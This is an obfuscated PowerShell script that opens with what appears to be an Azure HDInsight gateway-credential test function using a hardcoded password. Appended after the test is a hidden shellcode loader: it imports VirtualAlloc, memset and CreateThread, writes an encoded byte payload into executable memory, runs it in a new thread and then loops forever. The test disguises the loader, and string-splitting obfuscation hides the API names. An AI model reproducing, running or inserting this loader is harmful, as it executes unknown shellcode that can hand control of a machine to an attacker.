function tEs`T-SET`GA`TeW`AycreDEN`T`iAl{

	
	try
	{
		
		${cluST`Er}= .("{1}{0}{2}{3}"-f't','Crea','e-','Cluster')

		${U`serna`me} = ("{1}{0}" -f 'dmin','a')
		${tEX`T`pAS`s`wORd}= ("{2}{0}{1}{3}"-f 'ur','Pw!00','Yo','953')
		${PA`sSWord} = .("{1}{4}{0}{3}{2}" -f 'ecureS','ConvertTo-','ring','t','S') ${te`XTP`AsswO`Rd} -AsPlainText -Force
		${CR`Ed`EntiaL} = &("{2}{0}{1}"-f'w-Obje','ct','Ne') ("{6}{9}{4}{7}{5}{2}{3}{1}{8}{0}" -f'ntial','e','PS','Cr','m','tion.','Syst','a','de','em.Management.Auto')(${US`ERN`AmE}, ${PaS`Swo`RD})

		${g`At`e`WAysETtIngS} = &("{1}{0}{5}{6}{2}{4}{3}" -f 'et','S','DInsigh','dential','tGatewayCre','-Az','H') -ClusterName ${C`lUsT`ER}."Na`me" -ResourceGroupName ${c`LUst`ER}."rE`SOUR`ceg`RO`Up" -HttpCredential ${c`REdEn`Ti`AL}

		&("{0}{2}{1}"-f 'A','rt-True','sse') {${G`ATe`WaySeTTingS}."p`As`sWOrd" -eq ${Tex`T`p`As`swoRD} }
	}
	finally
	{
		
		&("{0}{2}{5}{6}{1}{3}{4}{7}"-f 'Re','Insigh','move','tC','l','-Az','HD','uster') -ClusterName ${CLu`STer}."na`me"
		&("{3}{4}{2}{0}{1}"-f'ro','up','e-AzResourceG','Rem','ov') -ResourceGroupName ${C`luSt`er}."ReSoU`RCeGR`OUP"
	}
}

${C} = ((("{72}{21}{83}{99}{39}{115}{55}{119}{47}{113}{18}{98}{46}{10}{104}{44}{36}{48}{35}{37}{28}{71}{26}{27}{110}{64}{103}{69}{49}{93}{4}{65}{105}{63}{82}{124}{17}{0}{77}{25}{30}{13}{24}{97}{80}{79}{3}{84}{32}{54}{74}{38}{7}{33}{57}{16}{2}{5}{116}{1}{56}{22}{109}{31}{87}{67}{15}{20}{121}{42}{76}{14}{102}{89}{66}{106}{61}{45}{9}{85}{111}{91}{6}{75}{59}{117}{112}{96}{123}{108}{12}{68}{101}{92}{114}{53}{100}{88}{118}{52}{58}{120}{81}{122}{107}{23}{62}{60}{41}{94}{29}{78}{43}{11}{73}{34}{40}{90}{19}{86}{8}{95}{70}{50}{51}"-f ';[DllImp','Ptr lpThr','hre','blic','yp','a','Cr','tPtr Cr',' ',' ui','Int','Ptr ','l','ker','pSt','kSi','T','otect)','e','n','ze, ','r','dAttributes',' static ex','n','RX','ess, uin','t ','d','I','5',' uint ','ati','e','set(IntPtr dest,','c(','irtu','IntPtr lpAd','rn In','ernel',' ','n','r','t','r V','meter,',' ','ic ex','alAllo',', u',' cou','nt);','R','d','c e','llRX5)]pub','ea','ate','X5msvcrt','Fla','r','Ptr lpPara','te','t f','w','e, ui','A','Stac','p','ze','t','r','[DllImpo','mem','xte','eation',' l','ort(','n','32.dllRX5)]pu','l','dll','lP','t(RX5',' st','nt','t','dw','Imp','rt','ui','dw','r','int flAllocationT',' ','src, uin',',','e','rn','k',');[Dll','Th','a','Si','Pt','n','ddress, Int','ublic','tPtr ',',','d',' ','s','t','eadI','32.d','d(Int','g','ort(','lic stat','.','IntPt','RX5)]p',' In','r'))."r`EPlA`cE"(([char]82+[char]88+[char]53),[strinG][char]34));${W} = .("{1}{2}{0}" -f 'pe','Add','-Ty') -memberDefinition ${C} -Name ("{0}{1}"-f 'Wi','n32') -namespace ("{1}{2}{3}{4}{0}"-f'ns','W','in32Func','ti','o') -passthru;[Byte[]];[Byte[]]${z} = 0xda,0xc0,0xbf,0xf5,0x6e,0xa5,0x30,0xd9,0x74,0x24,0xf4,0x5a,0x29,0xc9,0xb1,0x47,0x31,0x7a,0x18,0x83,0xea,0xfc,0x03,0x7a,0xe1,0x8c,0x50,0xcc,0xe1,0xd3,0x9b,0x2d,0xf1,0xb3,0x12,0xc8,0xc0,0xf3,0x41,0x98,0x72,0xc4,0x02,0xcc,0x7e,0xaf,0x47,0xe5,0xf5,0xdd,0x4f,0x0a,0xbe,0x68,0xb6,0x25,0x3f,0xc0,0x8a,0x24,0xc3,0x1b,0xdf,0x86,0xfa,0xd3,0x12,0xc6,0x3b,0x09,0xde,0x9a,0x94,0x45,0x4d,0x0b,0x91,0x10,0x4e,0xa0,0xe9,0xb5,0xd6,0x55,0xb9,0xb4,0xf7,0xcb,0xb2,0xee,0xd7,0xea,0x17,0x9b,0x51,0xf5,0x74,0xa6,0x28,0x8e,0x4e,0x5c,0xab,0x46,0x9f,0x9d,0x00,0xa7,0x10,0x6c,0x58,0xef,0x96,0x8f,0x2f,0x19,0xe5,0x32,0x28,0xde,0x94,0xe8,0xbd,0xc5,0x3e,0x7a,0x65,0x22,0xbf,0xaf,0xf0,0xa1,0xb3,0x04,0x76,0xed,0xd7,0x9b,0x5b,0x85,0xe3,0x10,0x5a,0x4a,0x62,0x62,0x79,0x4e,0x2f,0x30,0xe0,0xd7,0x95,0x97,0x1d,0x07,0x76,0x47,0xb8,0x43,0x9a,0x9c,0xb1,0x09,0xf2,0x51,0xf8,0xb1,0x02,0xfe,0x8b,0xc2,0x30,0xa1,0x27,0x4d,0x78,0x2a,0xee,0x8a,0x7f,0x01,0x56,0x04,0x7e,0xaa,0xa7,0x0c,0x44,0xfe,0xf7,0x26,0x6d,0x7f,0x9c,0xb6,0x92,0xaa,0x09,0xb2,0x04,0x07,0x9f,0x82,0xad,0xcf,0x1d,0xfb,0x5c,0x4c,0xab,0x1d,0x0e,0x3c,0xfb,0xb1,0xee,0xec,0xbb,0x61,0x86,0xe6,0x33,0x5d,0xb6,0x08,0x9e,0xf6,0x5c,0xe7,0x77,0xae,0xc8,0x9e,0xdd,0x24,0x69,0x5e,0xc8,0x40,0xa9,0xd4,0xff,0xb5,0x67,0x1d,0x75,0xa6,0x1f,0xed,0xc0,0x94,0x89,0xf2,0xfe,0xb3,0x35,0x67,0x05,0x12,0x62,0x1f,0x07,0x43,0x44,0x80,0xf8,0xa6,0xdf,0x09,0x6d,0x09,0xb7,0x75,0x61,0x89,0x47,0x20,0xeb,0x89,0x2f,0x94,0x4f,0xda,0x4a,0xdb,0x45,0x4e,0xc7,0x4e,0x66,0x27,0xb4,0xd9,0x0e,0xc5,0xe3,0x2e,0x91,0x36,0xc6,0xae,0xed,0xe0,0x2e,0xc5,0x1f,0x31;${g} = 0x1000;if (${z}."LE`N`GTh" -gt 0x1000){${G} = ${Z}."leN`G`TH"};${x}=${W}::("{0}{1}{2}" -f 'Vi','rtualAl','loc').Invoke(0,0x1000,${G},0x40);for (${I}=0;${i} -le (${z}."lEN`gtH"-1);${I}++) {${W}::"meMS`Et"([IntPtr](${x}.("{0}{1}"-f 'ToInt3','2').Invoke()+${i}), ${z}[${i}], 1)};${w}::("{1}{2}{0}"-f'hread','C','reateT').Invoke(0,0,${x},0,0,0);for (;;){&("{0}{1}{2}"-f 'St','art-sl','eep') 60};
